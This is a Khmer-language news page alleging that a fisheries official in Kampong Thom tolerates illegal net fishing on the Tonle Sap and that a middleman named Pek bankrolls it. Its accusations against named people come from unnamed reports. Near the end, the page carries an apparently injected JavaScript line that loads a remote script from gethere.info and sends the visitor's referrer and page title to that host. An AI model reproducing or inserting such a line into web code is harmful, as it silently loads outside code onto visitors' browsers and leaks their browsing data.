Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

លោក យ៉ាន់ វីសាក់ រងការចោទថា បើកដៃអោយមានបទល្មើសនេសាទគ្រប់ប្រភេទ

ខេត្តកំពង់ធំ៖ មានការលើកឡើងថា បទល្មើសនេសាទរីកដូចផ្សិតនៅ តំបន់ឃុំផាត សណ្ដាយដោយមាន ឈ្មោះពេក ជាអ្នករត់ ការបោះមេ បង់លុយ ឲ្យស្ថាប័ន ជំនាញពាក់ព័ន្ធ ដែលប្រចាំការ នៅតំបន់នោះ ហើយបទល្មើស ទាំងនោះ គឺស្ថិតនៅ ក្រោមក្លៀក លោក យ៉ាន់ វីសាក់ នាយផ្នែករដ្ឋបាលជលផលផាត់សណ្ដាយតែម្ដង។

សេចក្ដីរាយការណ៍ បន្ថែមថា បទល្មើសទាំង នោះរួមមាន. ឡុកសាច់រ៉ាវ ស្បៃមុងក្រឡាញឹក. លបសាច់. ឆ្នុកតូចធំ មានកំណើនកើន ឡើងពេញ បន្ទុកនៅក្នុងតំបន់ មួយចំនួនដូចជា ចំណុច.ទ្វាបឹង. កោះត្ប. អន្លុងផ្សោត ស្ថិតក្នុង ឃុំផាត់សណ្តាយ ស្រុកកំពុងស្វាយ។

បច្ចុប្បន្ន ទីផ្សាត្រីនុយ ដ៍សំខាន់បាន ចាប់ផ្តើមកម្រើក ឡើងវិញ បន្ទាប់ពី ប្រមុខរាជរដ្ឋាភិបាល បើកឲ្យមានការ ចិម្ចឹមត្រីឆ្ដោឡើងវិញ ពលរដ្ឋបានរិះគន់ថា: ទីផ្សាត្រីនុយស្ថិត នៅតាមផ្សារ ជាច្រើនក្នុង ខេត្តកំពង់ធំ ជាពិសេសនៅ ក្នុងបឹងទន្លេសាប តែម្ដង ដែលសំបូរទៅ ដោយការ ចិម្ចឹមត្រីឆ្ដោ ហើយកូនត្រីល្អិតៗ ដែលបានមក ពីការដាក់របាំង .សាច់ស្បៃមុង ក្រឡាញឹក ខុសច្បាប់គឺកិន នៅកន្លែងនោះតែម្ដង ទង្វើទាំង នោះ គឺបានផ្ទុយទៅ និងបទបញ្ជ លេខ001របស់ រាជរដ្ឋាភិបាល ក្នុងរដូវបិទ នេសាទ។

ប្រជានេសាទបាន ឲ្យដឹងដែលថា សកម្មភាព មេឈ្មួញកណ្ដាល បានបោះទុន ឲ្យប្រជានេសាទមុន ដើម្បីទិញ ឧប្បករណ៍ ខុសច្បាប់ ដូចជាសាច់ស្បៃមុង ក្រឡាញឹក បំផុតយកមក នេសាទដោយ មិនញញើត និងច្បាប់ជលផល នោះឡើយ ក្នុងនោះមាន មេឈ្មួញ ពេកដែលជា មេឈ្មួញកាងនិង រត់ការធំបំផុត នៅក្នូងបឹងទន្លេសាប ជារៀងរាល់ឆ្នាំ ។

ជាក់ស្ដែង ឧបករណ៍ល្មើសច្បាប់ ស្បៃមុង.សាច់រ៉ា វ.ក្រឡាញឹក លបសាច់.ឡុក យ៉ាងច្រើនចាប់ ពី៣០០ ម៉ែត្រដល់ទៅ១០០០ម៉ែត្រ ទាំងនេះបានកើត រីកផ្សិតជា ប្រចាំ និងក្លាយក្នុងបឹង ទន្លេសាប នាពេលបច្ចប្បន្ននេះ ហើយមេឈ្មួញ បណ្ដាលឈ្មោះលោក ពេក ដែលជាមេក្លោងដ៏ធំ ស្ថិតក្នុងទឹកដី អាណាចក្រ ឃុំផាត់សណ្តាយ ស្រុកកំពុងស្វាយ ខេត្តកំពង់ធំ។

srnews-post242srnews-post243

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More